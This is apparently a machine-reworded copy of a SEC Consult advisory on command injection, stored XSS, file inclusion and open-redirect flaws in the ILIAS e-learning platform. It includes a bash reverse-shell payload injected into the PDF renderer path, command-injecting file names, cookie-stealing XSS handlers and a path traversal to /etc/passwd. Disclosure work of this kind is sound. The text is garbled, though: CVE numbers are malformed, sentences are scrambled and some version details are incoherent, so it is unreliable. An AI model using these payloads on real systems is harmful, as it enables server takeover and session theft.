SEC Consult Vulnerability Lab Security Advisory 20221206-0
=======================================================================
Title: Many critical vulnerabilities
Product: ILIAS ELearning Platform
vulnerable version: <= 7.15
Fixed version 7.16
CVE numbers: CVE-202-25915, CVE-202-25916, and CVE-202-25917.
CVE-2022-45918
Impact is critical
homepage: https://www.ilias.de
found: 2022-09-30
by: Anna Hartig (Office Bochum)
Constantin Schwarz (Office Bochum)
Niklas Schilling (Office Munich)
SEC Consult Vulnerability Lab
A part of SEC Consult is an Atos company.
Asia
https://www.sec-consult.com
=======================================================================
Vendor description:
——————-
ILIAS has been around since 1998. It is an effective learning management system which fulfills all of your needs.
All your needs. It integrates tools for small and large companies.
Universities, schools, and the public sector can create custom,
individual learning scenarios.”
Source: https://www.ilias.de/en/
Recommendations for businesses:
————————
A patch is provided by the vendor and should be applied immediately.
SEC Consult strongly recommends that you conduct a comprehensive security assessment of your product
Security professionals are trained to find and solve potential problems.
Security issues
Vulnerability overview/description:
———————————–
1) Authenticated Direct OS Command Injection – CVE-202-25915
ILIAS uses several third-party software to complete tasks such as creating PDFs
scan uploaded files to identify viruses. They are known as using the
PHP exec() function. The arguments that are passed to the function exec() may be different in some cases.
Functions can contain input from users that has not been properly cleaned.
You can make a dangerous mistake by uploading files or performing malign configurations.
An attacker could execute system commands without the permissions of the web host
User (www-data).
This privilege is required to access the various command injection examples
From low rights to administration rights.
2) CVE-20222-45916 – Stored Cross-Site scripting
ILIAS identified multiple cross-site scripting vulnerabilities that could be stored.
Course items They were achieved either by bypassing existing XSS filter or
Simply by using the missing input validation entirely. The result is the
The user’s browser executes attacker-controlled JavaScript codes.
An attacker must have the ability to create course materials, such as tutoring a student.
course.
3. Local File Inclusion-CVE-2022-45918
A debugger is included in the SCORM editor. This gives authors insight into
The current session of SCORM Player, and all previous sessions. Accessing
The logs from previous sessions show that the debugger failed to verify the request.
File path allows for filesystem access at will.
4) Open Redirect CVE-202-25917
Function shib_logout.php redirects user to URL.
“return” parameter. An attacker could use this parameter, since it isn’t validated.
It can be used to redirect victims to arbitrary websites. It is an extremely powerful tool.
Phishing campaigns are a way to hide malicious websites behind links.
It looks as though it would lead you to the actual ILIAS website.
The proof:
—————–
1) Authenticated Direct OS Command Injection – CVE-202-25915
Numerous command injection vulnerabilities have been identified in multiple instances
Upload a ZIP archive
Users with normal assessments may submit their solutions by uploading a ZIP
archive. Archive are downloaded to the server, and then scanned for viruses
recursively. An attacker can use the directory and file name to inject.
System commands can be included, such as the include of a directory with name
$(touch/tmp/pwned to open the ZIP archive An attacker can exploit this vulnerability.
Is able to obtain a reverse shell from the ILIAS websiteserver using the rights of
web server user (www-data).
b) Creation of media objects
ILIAS can also be set up so users can create media objects from files
Inside an “Upload directory”. These files must be created before these objects can be used.
Scanned for viruses An attacker can use the file names to inject malware into your system.
commands. You can place a file named $(touch/tmp/pwned inside
Upload directory, then create a media object from it. An attacker can be
With the right to www-data, you can execute system commands.
server.
c) Creation of PDF documents
ILIAS allows users to export their content as PDF files. An user
Administrator rights allow you to configure the path for the PDF rendering program of your choice. An
This parameter can be used by an attacker to infect system commands. Because of missing
It is possible to insert multiple commands after validation. You can follow this path:
ILIAS requires that wkhtmltopdf be part of the payload. You can find it here.
Change the way to:
/usr/local/bin/wkhtmltopdf; bash -c “bash -i >& /dev/tcp//13373 0>&1”;
An attacker could open a reverse-shell with www-data rights that connects
Port 13373 to the machine of an attacker. When the attacker’s machine on port 13373 is attacked, initiate the reverse shell.
The export function has been activated.
This vulnerability can be exploited without the need to install a PDF renderer.
2) CVE-20222-45916 – Stored Cross-Site scripting
Numerous instances of cross-site stored scripting have been identified.
a) Several stored XSS attacks in tests
A JavaScript attacker should be capable of creating new JavaScript tests.
embeddable. The XSS payload is activated if the victim later accesses any of these tests.
activated. A filter is placed in the “Question” input field for a test.
Correctly remove HTML tags like script>
. Use half-open HTML
This filter is easily bypassed by using tags E.g.
<img src="x" onerror="alert(document.cookie)"
You can use this HTML tag in an “Introductory message” section of your test.
To trigger an XSS. End the JavaScript code by putting a quotation
Mark or Space, used to separate the HTML tag from subsequent HTML tags.
Incorporated into a test
The “Question” input field for the question type “Long Menu”, was finally activated.
It was found that there is no filtering, which allows for unrestricted access to the data.
You can use any HTML tag, such as “script”
b) Title of courses items: Stored XSS
A stored item may be accessed by an attacker who has the right to make an arbitrarily designed course.
XSS Attack by changing the title to the element
” onclick=”alert(document.cookie)”
Clicking on the button right above the title will bring up the XSS Payload.
triggered.
c) HTML Sites Stored XSS
A stored attack can be conducted by an attacker who has the rights to modify a HTML Learning Module.
XSS Attack, because it’s allowed to add JavaScript Code to the HTML pages. Even
If this is intentional, it can be considered insecure behavior and a bad habit.
3. Local File Inclusion-CVE-2022-45918
The SCORM Debugger needs to be activated for all ILIAS.
platform. A SCORM attacker can access the SCORM Player.
Debug and ask for the logs from a prior session. You can change the value of
The “logFile query parameter” of the request can be used to read any number
Files of the filesystem on the server. To read, for example, the passwd files
An attacker could alter the logfile parameter value on Linux systems
to “../../../../../../../../../etc/passwd”.
4) Open Redirect CVE-202-25917
Open redirection is possible with the shib_logout function.
This vulnerability is successfully used to redirect URLs
“https://www.sec-consult.com” is:
http://ILIAS-URL/shib_logout.php?action=logout&return=https://www.sec-consult.com
Versions that are vulnerable or tested:
—————————–
These vulnerabilities were discovered in ILIAS Version 7.14.
A quick analysis of the source code shows that there are several
Versions older than 3.8.4 have vulnerabilities.
It is therefore assumed that all current products are affected.
Version 7.15 partially fixed the vulnerabilities. A complete patch is available.
Version 7.16 is available.
Vendor contact timeline:
————————
2022-10-07: Contacting vendor through [email protected]
2022-10-19
2022-10-25 – Extend email recipients to [email protected] or [email protected]
The vendor’s website provided personal email addresses.
2022-10-25: Sending an advisory to the contact provided
2022-10-30: More information requested by the Vendor
2022-10-31: Sending detailed PoC
2022-11-10: Interested in current status
2022-11-22: Vendor confirms availability of patches by 2022-11-25
2022-11-22: Interested in the versions of patches mentioned and CVE IDs
2022-11/23: Vendor gives information on patched version; CVE IDs to be
SEC Consult
2022-11-24: Vendor issues patched version 7.16
2022-12-06 : Public Release of Security Advisory
Solution:
———
Download ILIAS version 7.16 and higher from the vendor’s site:
https://docu.ilias.de/goto.php?target=st_229
Workaround:
———–
None
Contact Us:
————-
https://sec-consult.com/vulnerability-lab/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult is an Atos Company
Asia
SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab, which is part of SEC Consult.
Atos company. SEC Consult continues to gain knowledge through this.
The attacker must be kept in the forefront of application and network security. You can find the following:
SEC Consult Vulnerability Lab offers high-quality penetration testing.
Evaluation of offensive and defensive technology for customers.
Our customers receive the latest information on vulnerabilities.
a valid recommendation on the risk profile for new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Are you interested in working with SEC Consult’s experts?
Send us your application https://sec-consult.com/career/
SEC Consult experts can help you improve your cyber security.
Contact our local offices https://sec-consult.com/contact/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Send mail to [email protected] Dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF A. Hartig, C. Schwarz, N. Schilling / @2022